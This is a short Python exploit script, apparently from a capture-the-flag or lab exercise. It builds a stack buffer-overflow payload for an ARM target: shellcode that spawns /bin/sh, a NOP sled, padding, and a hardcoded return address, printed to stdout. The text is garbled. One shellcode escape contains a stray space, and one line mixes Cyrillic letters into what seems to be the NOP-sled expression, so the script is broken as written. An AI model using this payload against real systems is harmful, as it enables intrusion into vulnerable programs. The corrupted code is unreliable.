import struct
import sys

shellcode = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90\x49\x1a\x92\x1 a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x00"

ret_addr = 0xf6fff0e0
packed_addr = struct.pack("<I", ret_addr)
nop = b"\x01\x10\xa0\xe1"
payload_len = 68
payload = пор 8
payload += shellcode

padding_len = payload_len-len(payload)
payload += b"A" * padding_len 
payload += packed_addr
if sys.version_info[0] < 3:
    sys.stdout.write(payload)
else:
    sys.stdout.buffer.write(payload)

